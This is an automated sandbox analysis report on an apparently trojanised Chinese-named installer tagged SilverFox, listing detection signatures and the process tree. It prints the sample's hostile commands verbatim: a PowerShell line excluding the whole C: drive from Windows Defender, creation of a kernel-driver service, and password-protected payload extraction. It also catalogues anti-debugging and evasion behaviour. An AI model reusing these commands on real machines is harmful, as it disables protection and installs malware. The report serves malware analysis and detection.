
Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.5.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_2.0.5.exe
renamed because original name is a hash value
Original sample name: _2.0.5.exe
Analysis ID: 1579694
MD5: c17bd872bfa6b9e26aa03ad02ceaaca0
SHA1: a2cc5d1e3526ad5b415ba875b12e1e42d48411ce
SHA256: 43a0b8a907d46b77e8695c8c00f90a6812f9bdb138d2ae53c1ce0d9b4362e610
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.5.exe (PID: 768 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" MD5: C17BD872BFA6B9E26AA03AD02CEAACA0)
    • #U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PID: 6032 cmdline: "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 3568 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2772 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.5.exe (PID: 6864 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT MD5: C17BD872BFA6B9E26AA03AD02CEAACA0)
        • #U5b89#U88c5#U52a9#U624b_2.0.5.tmp (PID: 3772 cmdline: "C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$30412,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 3684 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6212 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5272 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6600 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2848 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6680 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4936 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5372 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1992 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3228 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3756 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 356 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6468 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2344 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2340 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6344 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4536 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 60 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7092 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3756 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5204 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5356 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4136 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7096 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3284 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3276 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3352 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4464 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4200 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4268 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7000 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7092 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5500 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 356 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7108 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7008 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1508 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2352 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5428 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6776 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 6032, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3568, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5272, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6600, ProcessName: sc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 6032, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3568, ProcessName: powershell.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5272, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 6600, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ParentProcessId: 6032, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3568, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: C:\Program Files (x86)\Windows NT\hrsw.vbc; Virustotal: Detection: 10%
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe; Virustotal: Detection: 8%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 93.2% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; source: 7zr.exe, 0000000D.00000003.1550924989.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000D.00000003.1550847522.0000000003970000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.13.dr
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Code function: 7_2_6C68AEC0 FindFirstFileA,FindClose,FindClose,7_2_6C68AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_00826868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00826868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 11_2_00827496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00827496
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr; String found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr; String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr; String found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr; String found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr; String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.dr; String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422423132.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422859816.000000007F22B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.1424499799.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000000.1515986728.0000000000B2D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr; String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422423132.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.1422859816.000000007F22B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000000.1424499799.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000007.00000000.1515986728.0000000000B2D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.6.dr, #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr; String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp; Process information set: 01 00 00 00

System Summary

Source: update.vac.2.dr | Static PE information: section name: .=~
Source: update.vac.7.dr | Static PE information: section name: .=~
Source: hrsw.vbc.7.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C513886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6C513886
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C695120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,7_2_6C695120
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C513C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6C513C62
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C695D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6C695D60
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C513D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6C513D62
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C513D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6C513D18
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 7_2_6C5139CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6C5139CF
